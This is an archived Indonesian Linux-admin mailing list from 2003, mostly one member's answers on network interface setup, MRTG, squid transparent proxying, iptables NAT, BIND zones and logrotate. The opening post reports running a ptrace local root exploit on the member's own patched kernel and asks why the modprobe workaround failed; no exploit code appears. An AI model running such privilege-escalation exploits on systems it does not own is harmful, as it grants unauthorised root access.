PROTECTED]
[linux-admin] Anti ptrace
Salam, Saya punya Linux RedHat 7.2 dan sudah saya upgrade kernel ke 2.4.20 dengan patch dari OpenWall. Trus iseng saya coba jalankan ptrace exploit. [EMAIL PROTECTED] agung]$ uname -a Linux firewall 2.4.20 #1 Rab Apr 30 14:29:13 WIT 2003 i686 unknown dan udah saya ikuti langkah anti ptrace : # echo "/home/agung/kernelsucks" > /proc/sys/kernel/modprob [EMAIL PROTECTED] agung]$ cat /proc/sys/kernel/modprobe /home/agung/kernelsucks Tapi begitu, saya jalankan program exploit : [EMAIL PROTECTED] exp]$ ./kernel sh-2.05# whoami root sh-2.05# Kok masih bisa tembus yach. Gimana kira2x solusinya ? Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
linux-admin@linux.or.id
At 16:05 06/08/2003 +0700, you wrote: dear all nanya lagi nih !! saya ada koneksi internet melalui kable UTP dari ISP dia kasi ip, DNS, Gateway yg saya binggung gimana caranya konfigurasi ini. saya punya 2 buah NIC satu untuk lokal satu untuk koneksi internet ini. dimana saya bisa memasukan IP , DNS , GT dari iSP ini trus konfigurasi dari NIC lokal gimana Asumsi IP yg diberikan oleh ISP anda adalah 202.10.10.10 gateway : 202.10.10.9broadcast : 202.10.10.15 network : 202.10.10.8 (utk IP broadcast dan IP Network ini, tanyakan ke ISP anda utk realnya, termasuk Netmasknya sekalian) DNS : 202.10.10.100 dan 202.10.10.101 Network intranet anda adalah 192.168.0.0/28, dan IP yg akan di gunakan di PC Gateway anda adalah 192.168.0.1 eth0 ke ISP, dan eth1 ke intranet. eth0 kasih IP 202.10.10.10, dgn cara : # vi /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 BOOTPROTO=static BROADCAST=202.10.10.15 IPADDR=202.10.10.10 NETMASK=255.255.255.248 NETWORK=202.10.10.8 ONBOOT=yes GATEWAY=202.10.10.9 eth1 kasih IP 192.168.0.1, dgn cara : # vi /etc/sysconfig/network-scripts/ifcfg-eth1 DEVICE=eth0 BOOTPROTO=static BROADCAST=192.168.0.255 IPADDR=192.168.0.1 NETMASK=255.255.255.0 NETWORK=192.168.0.0 ONBOOT=yes Kemudian masukkan IP DNS : # vi /etc/resolv.conf nameserver 202.10.10.100 nameserver 202.10.10.101 Setelah di simpan, jangan lupa restart networknya. Kalo saya pake RedHat, biasa dgn cara ini : # service network restart Setelah itu, coba lakukan PING ke gateway yg dikasih ISP. # ping 202.10.10.9 Coba test dgn PING ke domain. Setelah sukses, ubah setting IP Gateway para PC CLient ke IP 192.168.0.1. Coba browsing. Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] Game WorlBiz
Salam, Ada yg pernah main game online dari http://www.isc.ro gak yach ? Port nomor berapa sich yg dipake ? Soalnya ada orderan dari bos utk nutup game tsb, krn karywan sering main game di kantor :( Padahal, game tsb saya juga blum pernah pake. Saya tahu dari temen yg suka main itu. Ada yg bisa bantu ? Terima kasih Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Nanyain license StarOffice
At 12:57 13/08/2003 +0700, you wrote: Hello, Saya newbie, mo nanyain aplikasi office ada yang free ngga di linux ? Kalo StarOffice itu license ngga yah ? ada yang tau harga license nya ? dan seberapa powerfull dia dibanding ms office mis. 2000 ? thank you Kenapa gak OpenOffice ajah ? (http://www.openoffice.org) Udah free, trus fasilitasnya lengkap dan bisa dibilang jadi saingannya MS Office. Kalo mau beli CD, ada tuch toko on line khusus Linux di Indonssia (kalo gak salah, doi aktif juga di milist ini) Atau kalo bandwidth di kantor lumayan kenceng, download aja dari situs-nya. Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
linux-admin@linux.or.id
At 10:57 07/08/2003 +0700, you wrote: Dear Agung Ud and others, Saya ada yg belum jelas, asumsi IP dari ISP utk broadcast 202.10.10.15 dan Network 202.10.10.8, apakah artinya kita dpt IP publik sebanyak 8 buah dgn range dari 202.10.10.8 sampai 202.10.10.15. Kalo dalam contoh saya yg kemaren, jawabnya IYA. Tapi ini tergantung deal anda dgn ISP. Mungkin pada kasus anda, tidak mendapatkan IP sebanyak itu, bisa jadi hanya 3. Utk jelasnya, silahkan tanya aja ke ISP tempat anda. Saya sedang proses mau ganti O/S utk proxy saya dr M$(Proxy Server2.0) ke Linux(RH7.0), apakah sebaiknya IP subnet antara Server (DNS, Mail Server, NFS, Web Server) (192.168.1.0) dipisah dgn user (192.168.0.0), atau digabung dlm satu subnet. (misal : 192.168.0.0) Kenapa mesti dipisah ? Kalo dipisah, berarti kita mesti buat routing juga. (dan 2 buah NIC utk masing2x subnet) IMHO, kalo hanya utk keperluan intranet dan dgn user yg sedikit, saya kira gak di pisah juga gak apa2x kok. CMIIW mohon pencerahan chris Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
linux-admin@linux.or.id
At 13:57 07/08/2003 +0700, you wrote: ===> baik, kalau saya dapat dr 20x.x.x.49 (router), 20x.x.x.50(proxy M$) sampai (20x.x.x55) jadi dpt 7 buah IP publik. Betul, 100 buat anda. pada file /etc/sysconfig/network-scripts/ifcfg-eth0 apakah sebaiknya diisi BROADCAST dan NETWORK atau tidak, Lha iya harus di isi tho mas. kemudian utk GATEWAY apakah sebaiknya diisi di file tsb atau di file /etc/sysconfig/network atau kedua file ini diisi. cukup di isi di /etc/sysconfig/network udah cukup saya kira. ===> pengertian saya dipisah ini utk lebih aman saja (cmiiw), dgn asumsi yg ada skrg user ada sekitar 60 user (sendiri, dgn ip private 192.168.1) dan kita mau merubah proxy server kita dari M$ ke Linux (PC tersendiri) , kemudian mau membuat mail server, DNS, NFS, Web Server ( dlm 1 pc, dgn ip private 192.168.0). Saya coba buat gbr illustrasinya, mohon saran dan masukan utk kondisi seperti ini.: |-> 192.168.1 --> Mail Server, Webserver, DNS, NFS | Internet -> Router -> Proxy/NAT -> | | |--> 192.168.0 --> user1, user2, user3 dst Menurutku bagus juga tuh, kalo alasan security. Tapi kalo Mail Server ber IP private, mungkin agak susah settingnya. dan utk mail server, web server, DNS dan NFS apakah sebaiknya diinstall dlm 1 pc atau dipisah menjadi beberapa pc 9 misal : mail server dgn DNS) dan web server dgn NFS. Lihat load-nya dulu. Kalo hanya utk menghandle 60 user saja, saya kira dijadiin satu gak apa2x Web, DNS dan Mail dlm 1 PC. Sedang NFS 1 PC sendiri. CMIIW Mungkin temen yang lain ada masukan. Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] MRTG 100Kbps apa betul memang 100Kbps ??
At 14:34 30/07/2003 +0700, you wrote: Karena muncul topik baru maka diganti topicnya (: Sekarang ini ada muncul pertanyaan betulkah MRTG 100Kbps betul - betul kita memang 100Kbps dapat bandwidth dari Internet ? Sekarang ini juga saya masih mencari gimana caranya membuktikan bahwa 100Kbps di MRTG itu memang betul - betul murni atau hanya traffic yang error bulak balik ke router kita ? kalau saya paling mengakalinya dengan dicoba parent default squid ke proxy di luar (IRCACHE) dari situ didapat bandwidth murni yg kita dapat dari INTERNET.. Pernah saya buktikan, saat itu ada gangguan di link international (kata ISP), dan emang bener MRTG jadi sekitar 10 Kbps. Pada kasus saya, bisa jadi itu hanya b/w ke ISP, dimana di ISP nerapin transparent proxy, jadi wajar aja kalo betul2x gede. Tapi kalo b/w ke international, kayaknya utk pelanggan KV personal, di share rame2x. Bisa2x CIR-nya 1 : ~ ;( Kalo pake proxy ke luar negeri, saya pernah buktiin, emang bener2x lambat. Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] [OOT] MRTG
At 13:50 30/07/2003 +0700, you wrote: Pengalaman pribadi yach ? Tapi idealnya memang berapa sih kalau untuk Cable Personal ? 64Kbps ? kalau cuma sendiri biasanya sih 64Kbps itu habis untuk Kazaa dan DAP, apalagi kalau lihat traffic IN / OUT nya besarnya hampir sama.. Kalo gak salah utk personal emang di bawah 64 Kbps. Tapi, saya gak tahu, di MRTG saya tiap hari menunjukkan angka sekitar 100 Kbps. Itu b/w ke ISP, gak tahu kalo dari ISP ke routing luar seberapa gede. Utk KV sich emang tergantung daerah, kalo daerahnya padat (Sudirman cs), gak akan bisa sampai 64 katanya. Tapi kalo daerah sepi (mungkin seperti daerah kantor saya, Tomang), ya itu tadi, bisa mendekati 100 Kbps. Saya share ke 50 PC, lumayan lah...asal nyaman buat browsing dan kirim email, udah cukup. .zip .exe .rar .mpeg .mp3 dan sebangsanya, udah gue suruh pergi di squid. Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] [OOT] MRTG
At 09:45 30/07/2003 +0700, you wrote: liat saja di weekly graph (graph ke 2 ->Realtek-RTL8139-Family-PCI-Fast-Ethernet-NIC) dimana average in nya hanya +- 27 kb/s gila kan saya menggunakan cable connection. Solusi apa yg hrs dilakukan ?? apa hrs marah2 kepada ISP nya ??? Kenapa harus marah ? Anda langganan Kable yg korporat apa personal ? Kalo personal, emang segitu jatahnya. Tapi bila anda langganan corporate, ya silahkan anda marah2x ke ISP, ntar ISP akan mem-ping-pong anda dan menyalahkan Kable Vision. Pusing khan yach...itulah negeriku yang tercinta :( Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] MRTG
Kayaknya SNMPD nya blum jalan tuch Coba cek dulu, biasanya service-nya namanya SMUX Contohnya ini : # nmap -sT localhost (The 1538 ports scanned but not shown below are in state: closed) Port State Service 21/tcp openftp 22/tcp openssh 80/tcp openhttp 199/tcpopensmux Agung Ud " . persembahkan yang terbaik dalam hidup ini ." At 08:57 28/07/2003 -0700, you wrote: salam linuxer mau nanya seputar konfigurasi mrtg neh.. saya ingin jalankan mrtg di server saya nih.. saya sudah mengedit /etc/mrtg/mrtg.cfg sbb: #== WorkDir: /var/www/html/mrtg Target[r1]: 2:[EMAIL PROTECTED] MaxBytes[r1]: 125 Title[r1]: Traffic Analysis PageTop[r1]: Stats for our Ethernet #= terus saya coba jalanin mrtgnya dengan command #/usr/bin/mrtg /etc/mrtg/mrtg.cfg tetapi koq gak jalan yahh keluar msg seperti berikut ini: [EMAIL PROTECTED] mrtg]# /usr/bin/mrtg /etc/mrtg/mrtg.cfg SNMP Error: no response received SNMPv1_Session (remote host: "10.1.2.26" [10.1.2.26].161) community: "public" request ID: 1638973708 PDU bufsize: 8000 bytes timeout: 2s retries: 5 backoff: 1) at /usr/bin/../lib/mrtg2/SNMP_util.pm line 450 SNMPGET Problem for ifInOctets.2 ifOutOctets.2 sysUptime sysName on [EMAIL PROTECTED] at /usr/bin/mrtg line 1491 WARNING: Expected a number but got '' WARNING: Expected a number but got '' == - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] routing with Linux
At 12:25 28/07/2003 +0700, you wrote: > Tapi setelah saya pake IPTABLES : > /sbin/iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE > /sbin/iptables -A FORWARD -i eth0 -j ACCEPT Suggest: /sbin/iptables -t nat -A POSTROUTING -o eth1 -j SNAT to 10.10.10.1 Kalo gak melibatkan IPTABLES kira2x bisa gak yach ? maksudnya gak usah di NAT, murni di routing doang. Apakah ada sintak lain yg mesti di berikan di Linux ? Udah saya coba dgn # route add -net 172.18.1.0 255.255.255.0 eth1 (mestinya gak pake itu juga gak apa2x khan, soanya default routingnya udah ke sono) Tapi tetep sama aja, mesti gak bisa PING dr client ke jaringan 172.18.1.0 (tapi bila pake IPTABLES, langsung bisa PING) Ini salah di Linux saya apa di CISCO di seberang sana ? > ping ke 10.0.0.2 sukses, demikian juga ping ke 172.16.0.1 sukses. > Tapi, dari jaringan 172.16.0.0, mereka gak bisa ping ke jaringan internalku > (192.168.0.0). Ping ke 192.168.0.199 (eth0 PC router saja gak bisa). boleh tau routing table di cisco ? #show prot , bunyinya gimana ? routing protocolnya pake apa ? Kebetulan yg pegang CISCO adalah Network Engineer kantor pusat, dan saya udah minta copy pastenya kayak gini : ps: kayaknya jaringan saya (192.168.0.0) belum dimasukkan ke table routing yach ? Maaf, bagi temen yg lain, ini agak OOT. btw, ada gak yach milist CISCO Indonesia ? # sho prot Global values: Internet Protocol routing is enabled Vlan1 is up, line protocol is up Internet address is 172.25.25.15/24 # sho ip route Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area * - candidate default, U - per-user static route, o - ODR P - periodic downloaded static route Gateway of last resort is 172.16.1.253 to network 0.0.0.0 S194.39.134.0/24 [1/0] via 172.16.1.15 100.0.0.0/16 is subnetted, 1 subnets S 100.0.0.0 [1/0] via 172.20.1.251 169.254.0.0/24 is subnetted, 1 subnets Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] routing with Linux
Salam, Saya punya 2 jaringan : 192.168.0.0 dan 172.16.0.0 Kedua jaringan saya hubungkan dgn wireless LAN, dan pake jaringan 10.0.0.0 192.168.0.199 <-->10.0.0.1 10.0.0.2<-->172.16.0.0 Yg di 172.16.0.0 pake CISCO sedang yg punya saya (192.168.0.0) pake RH 7.2 sbg routernya. Di PC Router saya (eth0=192.168.0.199 dan eth1=10.0.0.1), dengan default gateway ke 10.0.0.2 (ip interface di CISCO yg terhubung dgn perangkat wireless). Table routingnya udah kebentuk demikian nich : [EMAIL PROTECTED] root]# route Kernel IP routing table Destination Gateway Genmask Flags Metric RefUse Iface 10.0.0.0* 255.255.255.0 U 0 00 eth1 192.168.0.0 * 255.255.255.0 U 0 00 eth0 127.0.0.0 * 255.0.0.0 U 0 00 lo default 10.0.0.20.0.0.0 UG0 00 eth1 Di PC Router tsb, saya udah bisa ping ke 10.0.0.2, juga ke 172.16.0.0 (krn di ujung sana, CISCO udah di set juga). Pertanyaan : Setelah saya ambil salah satu PC Client di 192.168.0.0 (example: 192.168.0.48) kemudian gateway PC Client tsb saya arahkan ke 192.168.0.199 (eth0 dari PC Router), kok tetep gak bisa ping ke 10.0.0.2 yach ? (tapi ping ke 10.0.0.1 sukses). isi /proc/sys/net/ipv4/ip_forward sudah "1" Tapi setelah saya pake IPTABLES : /sbin/iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE /sbin/iptables -A FORWARD -i eth0 -j ACCEPT ping ke 10.0.0.2 sukses, demikian juga ping ke 172.16.0.1 sukses. Tapi, dari jaringan 172.16.0.0, mereka gak bisa ping ke jaringan internalku (192.168.0.0). Ping ke 192.168.0.199 (eth0 PC router saja gak bisa). Ada yg bisa kasih masukan ? Terima kasih. Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] Pembuatan NS mesti ijin ke ISP ??
Salam. Mau nanya ttg pembuatan NS (name server). Saya udah pernah berhasil buat NS di server colocation, dgn domain yg udah teregister. Dan berhasil. Dgn konfigurasi yg saya contek sama dgn perubahan IP tentunya, saya berencana buat NS lagi di server yg colocation di lain ISP. Pertama saya coba dgn membuat domain yg memang blum saja daftarin ke registrant. Misalkan, domainku.com Asumsi saya, walaupun domain blum diregister, tapi bila saya query dari mesin NS itu, akan berhasil. Ternyata tidak. (saya pake perintah : # dig -x 202.158.xxx.yyy ; <<>> DiG 8.2 <<>> -x ;; res options: init recurs defnam dnsrch ;; got answer: ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 4 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0 ;; QUERY SECTION: ;; yyy.xxx.158.202.in-addr.arpa, type = ANY, class = IN ;; Total query time: 1 msec ;; FROM:hostname to SERVER: default -- 127.0.0.1 ;; WHEN: Thu Jul 10 15:53:21 2003 ;; MSG SIZE sent: 45 rcvd: 45 Apakah memang demikian (dalam artian domain harus diregister). Apakah mesti kita minta ijin ke ISP bahwa di mesin saya, akan saya pasang DNS Server utk mengelola reserve PTR pd IP (CBN) yg saya punya ? note: - di mesin saya, ada 6 IP dan selama ini DNS-nya di handle oleh ISP. - DNS udah running (saya pake bind-9.2.2) #>>>>>>>>>>> /var/named/db.202.158.xxx <<<<<<<<<<<<<<<# $TTL 86400 @ IN SOA ns3.domainku.com. test.domainku.com. ( 2002050100 ; serial 28800 14400 360 86400 ) IN NS ns3.domainku.com. IN NS ns4.domainku.com. IN MX 10 mail.domainku.com. yy1 IN PTR ns3 yy2 IN PTR ns4 # >>>>>>> /var/named/domainku.com <<<<<<<<<<<<<<### TTL 86400 @ IN SOA ns3.domainku.com. test.domainku.com. ( 2002050100 ; serial 28800 14400 360 86400 ) IN NS ns3.domainku.com. IN NS ns4.domainku.com. IN MX 10 mail.domainku.com. IN A 202.158.xxx.yyy ns3 IN A 202.158.xxx.yyy ns4 IN A 202.158.xxx.yyy Agung Ud "persembahkan yang terbaik dalam hidup ini " - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] mo tanya tentang logrotate
At 09:17 09/07/2003 +0800, you wrote: gimana kita mau mengetahui apa saja file yang dijalankan oleh logrotate ? apakah yang ada di /ect/logrotate.d ? atau kita harus membuat script sendiri jika ia tolong beritahu contonya ? Betullihat aja file2x yg ada di bawah /etc/logrotate.d/ Di situ khan ada contohnya, tinggal di ganti yg perlu aja kok, gak sulit :) Agung Ud "persembahkan yang terbaik dalam hidup ini " - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] ukur total bandwidth per hari...
At 08:56 PM 6/30/03 -0700, you wrote: dengan mengunkaan mrtg dan snmp pada server gateway warnet anda, sudah bisa melihat total pengunaan bw user per 5 menit, per hari, per bulan, per tahun. Mumpung lagi ngomongin MRTG Emang bisa MRTG utk liat b/w per user ? Kok kalo di tempat saya, b/w yg terukur adalah b/w total yach (incoming dan outgoing). Gimana caranya utk liat b/w per user ? Thanks Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Re[4]: [linux-admin] Log pada transparent squid
At 06:10 PM 6/27/03 +0700, you wrote: tolong di betulkan asumsi saya saya mengasumsikan hubungan proxy anda sbg berikut : client -- proxy/gateway --- internet dalam hal ini saya juga merasa anda hanya memasang gateway untuk meloloskan semuanya, kebetulan proxy anda di buka pada port 80 maka secara pasti semua request http yang menuju gateway sudah terarahkan ke proxyini asumsi saya loh karena anda tak menceritakan kondisi di lapangan. kalu memang anda mau web server anda juga jalan tapi tidak mau di proxy ... cara yang gampang yah buka aja apache anda di port selain 80 misal 8080 atau 3128. jadi request httpnya menjadi http://alamat_proxy:8080 dengan demikian tidak bentrok, kalu anda paksakan jalan juga apachenya di portt 80 maka saya rasa salah satu pasti gak jalan. (CMIIW) Kalo saya kok nggak ya mas... PROXY saya di 8080, dan HTTP di 80 Itu semua dalam satu mesin, utk Gateway. Dan dgn IPTABLES saya "paksa" paket yg menuju 80 (baik keluar atau ke dalam mesin) ke 8080. Dan di squid.conf saya kasih ACL sehingga apabila ada permintaan ke domain lokal (intranet) gak pake PROXY. Gateway saya tersebut udah hampir 2 tahun saya pake utk sharing internet kable di kantor saya. Dan di sisi lain, saya fungsikan sbg web server (utk MRTG dan monitor user saat browsing). CMIIW Salam, Roed Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re[2]: [linux-admin] Log pada transparent squid
At 10:13 AM 6/27/03 +0700, you wrote: Misalnya ada server, httpd di port 80 untuk lokal.net. ada squid diport 3128 untuk network Yang dipaksa itu termasuk traffic untuk port 80 (lokal.net) juga ? Sehingga selalu --> user -- proxy -- web ? Bagaimana kalau ingin dikecualikan ? Karena kalo dari lokal, gak efisien masuk ke proxy untuk akses *.lokal.net/* Pake ACL always_direct contohnya : acl intranet dstdomain domain_lokal.com always_direct allow intranet CMIIW Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
RE: [linux-admin] Log pada transparent squid
At 01:50 AM 6/26/03 -0400, you wrote: Kalau belum ada access.lognya berarti belum ada yg akses donk proxynya (: 4 baris ajaib itu adalah untuk transparent proxy. bila ada webserver, pasang interface lagi khusus untuk web, biar gak bentrok. Mengapa mesti pasang interface baru ? Saya rasa gak perlu. Tinggal di set aja PROXY di port selain defaultnya HTTP (80), misalkan utk PROXY 8080 Kemudian dengan IPTABLES, "paksa" paket yg ingin akses ke 80 ke 8080, gampang tho ...:) Dengan konfigurasi seperti itu, saya tetep bisa menjalankan fungsi PROXY di gateway internet saya, dan di sisi lain, gateway tsb masih berfungsi normal sebagai web server. CMIIW. Ini beberapa baris teratas dari file squid.conf saya : http_port 8080 icp_port 3130 httpd_accel_host virtual httpd_accel_port 80 httpd_accel_with_proxy on httpd_accel_uses_host_header on Regards, Rio Martin. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] Logrotate aneh
Salam,
Saya mempunyai log apache yang aneh.
Log tersebut saya set di logrotate utk selalu merotate setiap 1 bulan sekali.
Tapi saat tgl 1 setiap bulannya, log menjadi aneh (seperti di bagian bawah
email ini), ini bukan hanya terjadi pada access_log, tapi juga file
error_log dan semua file log di bawah /var/log/htppd/
Ini konfigurasi logrotate saya.
Ada yang salah ?
/etc/logrotate.d/apache
/var/log/httpd/* {
monthly
missingok
sharedscripts
postrotate
/bin/kill -HUP `cat /usr/local/www/apache/logs/httpd.pid
2>/dev/null` 2> /dev/null || true
endscript
}
-rw-r--r--1 root root0 Jun 1 01:00 access_log.2
-rw-r--r--1 root root0 Jun 1 01:00 access_log.2.1
-rw-r--r--1 root root0 Jun 1 01:00 access_log.2.1.1
-rw-r--r--1 root root0 Jun 1 01:00 access_log.2.1.1.1
-rw-r--r--1 root root0 Jun 1 01:00 access_log.2.1.1.1.1
-rw-r--r--1 root root0 Mei 1 01:00 access_log.2.1.1.1.1.1
-rw-r--r--1 root root0 Apr 1 01:00 access_log.2.1.1.1.2
... dan masih banyak lagi
Agung Ud
---
".persembahkan yang terbaik dalam hidup ini ..."
-
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Logrotate aneh
At 11:01 AM 6/19/03 +0700, you wrote:
Ini yang anehV
/var/log/httpd/* {
monthly
missingok
sharedscripts
postrotate
/bin/kill -HUP `cat /usr/local/www/apache/logs/httpd.pid
2>/dev/null` 2> /dev/null || true
endscript
}
Jangan pake * tok. Kalo mau pake *.log. Kasih nama lognya error.log,
access.log, etc. Jadi tiap kali nge-rotate hanya *.log yang dirotate nggak
semua file dalam direktori tersebut yang di rotate.
He...hesaya kira, udah bisa dengan begitu ( * doang). Soalnya lagi
males nulis banyak file log :)
Thanks utk Om Iin dan Om Dapid
Agung Ud
---
".persembahkan yang terbaik dalam hidup ini ..."
-
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] MySQL Server Conflik
At 01:37 PM 6/16/03 +0700, you wrote: Hi, Linuxer mania aku mau minta tolong nih mudah2 mudahan bisa ngebantuin aku aku coba instal MySQL rpm -ivh MySQL-3.23.56-1.i386.rpm tapi muncul pesan error seperti dibawah ini : Error : failed dependencies MySQL-Server conflict with mysql-server-3.23.49-3 Coba uninstall dulu mysql-server-3.23.49-3 # rpm -e mysql-server-3.23.49-3 Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Mohon informasinya ...
At 03:53 AM 6/16/03 -0700, you wrote: tapi aku tidak ketemu yang mana rpmnya ya...??? software tersebut namanya cpanel versi 6 mohon informasinya regards Kalo itu bayar mas .. dan gak murah lho..:) Coba aja di http://www.plesk.com Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] DHCP Log
At 04:22 PM 6/13/03 +0700, you wrote: Jumat, 13/06/03 11:13:49, andi menulis: aa> saya pake dhcpd dari redhat, ada gag caranya biar log-nya di aa> disable atau pindah ke file /var/log/dhcpd ?? Coba 'man dhcpd'. Defaultnya lewat syslog dgn log facility LOG_DAEMON. Di /etc/syslog.conf ditambahkan misal 'daemon.* /var/log/daemon'. Di /etc/logrotate.d/syslog ditambahkan /var/log/daemon. Sebaiknya gak udah didisable, memang space HD-nya sudah kritis ? Utk tambahan : Bila ingin di /va/log/messages tidak muncul lagi : setelah di /etc/syslog.conf ditambahkan seperti yg di atas, misal : (dalam contoh ini, saya kasih nama dhcp.log) local6.*/var/log/dhcp.log jjangan lupa di baris yg ada tulisan "/var/log/messages", tambahin : "local6.none", contohnya : *.info;mail.none;authpriv.none;cron.none;local6.none /var/log/messages Akhirnya, restart syslog anda. CMIIW Semoga membantu Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] RH AS 21 Kernel Panic
At 02:54 PM 6/4/03 +0700, you wrote: so, kernel installer panic di mesin anda ya jangan pake kernel installer tersebut (distro tetap) (kalau slackware sih kernel installer bisa gonta-ganti) slackware oye! dan saya make mandrake nggak dapet kernel installer lain, ya mungkin jawaban gampangnya ganti distro tapi dari kasus seperti ini bisa terjadi komentar macem2 - menyalahkan linux - menyalahkan distro - menyalahkan hardware tapi no problem sih, asal nggak jadi flame war aja Masalahnya adalah, barang tsb (RH AS 21) tergolong barang mahal. So, kalo terjadi kayak gini, trus gimana ? Satu sisi, kita udah deal dgn consumen bahwa kita akan pasang RH AS 21 di mesin mereka, di sisi lain kita mesti mengganti salah satu dari keduanya (Hardware atau OS) agar bisa jalan. Pusing khan ? Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] RedHat AS
Salam, Mumpung masih hangat ngomongin RedHat AS. Dimanakah bisa kita beli RH AS di Indonesia ? Soalnya kalo langsung dari Amrik sono, Indonesia kena black list. Terima kasih. Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] OOT: milist PostgreSQL Indonesia
At 09:03 AM 6/3/03 +0700, you wrote: Dear All, Ada yang tau gak milist PostgreSQL Indonesia Thank's -- Irvan [EMAIL PROTECTED] sory one linear :) Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] FRESS
At 10:44 AM 4/3/03 +0700, you wrote: Mbok ya sopan dikit, Mas... Lagi stress ato apa sih, ngomong koq tereak-tereak begitu... Dapid Candra IT Department - karir.com Itu gak teriak mas, tapi Caps Lock-nya rusak. (kena rudal kali yach ) Agung Ud --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Membatasi Akses User
At 08:26 AM 4/3/03 +0700, you wrote: Hallo para admin yang baik, kalo mau membatasi akses user gimana ya ?, misalnya user tersebut hanya bisa berada di lingkungan Home Direktorynya sendiri dan hanya dapat mengeksekusi program2 tertentu saja, jadi misalkan user mengetikan ls / atau ls /usr akan permision denied. CHROOT http://people.cakraweb.com/~asfik/writings/chroot-login-sudo.html --- ".persembahkan yang terbaik dalam hidup ini ..." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] Transparan Proxy ku aneh
